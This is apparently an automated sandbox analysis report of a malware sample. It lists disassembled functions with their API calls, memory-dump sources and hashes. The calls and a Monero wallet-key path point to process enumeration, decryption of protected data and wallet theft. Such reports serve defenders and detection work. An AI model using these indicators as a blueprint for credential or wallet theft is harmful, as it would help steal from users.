                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *Vm$M"v|$Z~{$|!i;
                                • API String ID: 0-317792751
                                • Opcode ID: 3d4f29ebab1ca1cabb62b14a2818ed7031c53d9c5f93b02afe3f599de2d28b1a
                                • Instruction ID: e2b691c797548e092240163ed27020e91f927cacde83e6921f7d864a0717ee7e
                                • Opcode Fuzzy Hash: 3d4f29ebab1ca1cabb62b14a2818ed7031c53d9c5f93b02afe3f599de2d28b1a
                                • Instruction Fuzzy Hash: 90B26AF3A0C2149FE304AE2DEC8567AFBE5EF94720F1A853DEAC5C3744E93158058696
                                Function 0118CFE6 Relevance: 6.6, Strings: 4, Instructions: 1599COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %!m$F@g~$l#V$|:n?
                                • API String ID: 0-2933132540
                                • Opcode ID: 8c0f305d7e6ef38275774e881cacb441fd8858528c943fb93debf558e2983be2
                                • Instruction ID: 4cce3f36006feffa00fee7b127aa378497b85846b1acff9b988c9760d7dfddf3
                                • Opcode Fuzzy Hash: 8c0f305d7e6ef38275774e881cacb441fd8858528c943fb93debf558e2983be2
                                • Instruction Fuzzy Hash: 81B206F3A0C6009FE308AE29DC8567EF7E5EF94720F1A892DE6C487744EA3558418797
                                Function 00DD8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00DE05B7), ref: 00DD86CA
                                • Process32First.KERNEL32(?,00000128), ref: 00DD86DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00DD86F3
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • CloseHandle.KERNEL32(?), ref: 00DD8761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: db226194f2b076474b21416563ca1d0b87e299b8ac60b904bd9c3fb54787124f
                                • Instruction ID: b4a7b5ac5ac650fe6b935d5ea9c8d5b8be4567fa0b9dbe521baba280bb707639
                                • Opcode Fuzzy Hash: db226194f2b076474b21416563ca1d0b87e299b8ac60b904bd9c3fb54787124f
                                • Instruction Fuzzy Hash: 49316B71901258EBCB25EF99CC41FEEB778FF44700F10819AE50AA2290DB346A45CFB1
                                Function 00DD8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00DC5184,40000001,00000000,00000000,?,00DC5184), ref: 00DD8EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 741c0fd239c578805610c347a118e8ffad907bd4b414d1210b7c8b47b3296440
                                • Instruction ID: 19f4d1723277b08a8a0c0d326a2a0dd3124191adba3db2448857df9ecfd28d28
                                • Opcode Fuzzy Hash: 741c0fd239c578805610c347a118e8ffad907bd4b414d1210b7c8b47b3296440
                                • Instruction Fuzzy Hash: 0E110374200208FFDB11CF64E884FAA73AAAF89310F109549F959CB340DB36E941EB70
                                Function 00DC9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9B2A
                                • LocalFree.KERNEL32(?,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 8f568acf23c9499cfec76ef5248dd2f9ade38a4b1a8e4582113088d1344e7578
                                • Instruction ID: 5c57b86bae2c2596dc8b871e0d88b3ad842e5da0d712afac87011b33440624f2
                                • Opcode Fuzzy Hash: 8f568acf23c9499cfec76ef5248dd2f9ade38a4b1a8e4582113088d1344e7578
                                • Instruction Fuzzy Hash: 7711A4B4240308FFEB11CF64D895FAAB7B5FB89700F208058F9159B384C776AA01CB50
                                Function 00DD7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00DE0E00,00000000,?), ref: 00DD79B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD79B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00DE0E00,00000000,?), ref: 00DD79C4
                                • wsprintfA.USER32 ref: 00DD79F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: a4bb57b37b8dacd190417e25b10eeb4bd5b43b5023bcd538e7294badf30afb5f
                                • Instruction ID: 41402793664818eb4e25be60eb5992a060379c281e5d24da33bf8a1628b6a65f
                                • Opcode Fuzzy Hash: a4bb57b37b8dacd190417e25b10eeb4bd5b43b5023bcd538e7294badf30afb5f
                                • Instruction Fuzzy Hash: 4B112AB2A04218EBCB14DFD9D945BBEB7F8FB4CB11F10415AF645A2284E23D5940C7B0
                                Function 00DD7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0162E0E0,00000000,?,00DE0E10,00000000,?,00000000,00000000), ref: 00DD7A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD7A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0162E0E0,00000000,?,00DE0E10,00000000,?,00000000,00000000,?), ref: 00DD7A7D
                                • wsprintfA.USER32 ref: 00DD7AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 9b9b57f5064b4ee25f585a448a5ab17075cf91a3e66688848344ed138b436db6
                                • Instruction ID: 2e353270c56c919a52253d579991a1e3d4d110ed761101b4d78aaab687d8287a
                                • Opcode Fuzzy Hash: 9b9b57f5064b4ee25f585a448a5ab17075cf91a3e66688848344ed138b436db6
                                • Instruction Fuzzy Hash: B71182B1A45218DFDB20CB54DC45F59B778FB04721F1043DAE50A932C0D7745A44CF61
                                Function 00DD3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00DDE118,00000000,00000001,00DDE108,00000000), ref: 00DD3758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00DD37B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: 0337639a62c5c241b3c3e909ba00716224023d127811d05cc2c75ed8ed6cdab9
                                • Instruction ID: 369ad08a3ea47faccc043f5f9235d343011d8c313de6ab1151663d5b88d56387
                                • Opcode Fuzzy Hash: 0337639a62c5c241b3c3e909ba00716224023d127811d05cc2c75ed8ed6cdab9
                                • Instruction Fuzzy Hash: 8B41C970A40A189FDB24DB58CC95B9BB7B5FB48702F4041D9E609EB290D771AE85CF60
                                Function 01185395 Relevance: 4.6, Strings: 3, Instructions: 803COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,co$zoo$/[
                                • API String ID: 0-3143629062
                                • Opcode ID: ce2c4dde8e8bf14d4f1182040408e5f8a2f8dec34d58b9a184a700b236f2409a
                                • Instruction ID: 87b295c5218b642c4187418f38e38c218fdbb0a30914685b57758eb2d1eea372
                                • Opcode Fuzzy Hash: ce2c4dde8e8bf14d4f1182040408e5f8a2f8dec34d58b9a184a700b236f2409a
                                • Instruction Fuzzy Hash: B03227F3A0C2049FE7086E2DEC8567AFBE5EF94320F16463DEAC5C7344EA3558058696
                                Function 00DC9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DC9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00DC9BA3
                                • LocalFree.KERNEL32(?), ref: 00DC9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 5816de3383cd037d267ff6987d8ed37914ae58bff286901072a56b8f95ca9ad6
                                • Instruction ID: 824eb24b9c3a3adcb5a6fc4d6bddaa596d67ea0fba61b848395bec30cd47834a
                                • Opcode Fuzzy Hash: 5816de3383cd037d267ff6987d8ed37914ae58bff286901072a56b8f95ca9ad6
                                • Instruction Fuzzy Hash: A21109B8A00209EFDB05DF94D989EAEB7B5FF88300F104598E815A7340D775AE11CFA1
                                Function 01182000 Relevance: 4.5, Strings: 3, Instructions: 755COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3u?$6o;w$v8}{
                                • API String ID: 0-2025310420
                                • Opcode ID: 30a5c4a02119e3ed72f2e00a2a03046b0ee6d398bb46c2a7217e8b013b57773e
                                • Instruction ID: 8a91367046e1edf1d0f8cdcd9fe36c28c74059c9cf22c7b3a9a8229fe15439b3
                                • Opcode Fuzzy Hash: 30a5c4a02119e3ed72f2e00a2a03046b0ee6d398bb46c2a7217e8b013b57773e
                                • Instruction Fuzzy Hash: 533236F390C2149FE3087E2DEC8567ABBE9EF94320F16453DEAC483744EA3598458697
                                Function 01192206 Relevance: 4.1, Strings: 2, Instructions: 1640COMMON
                                Download Yara Rule
                                Strings
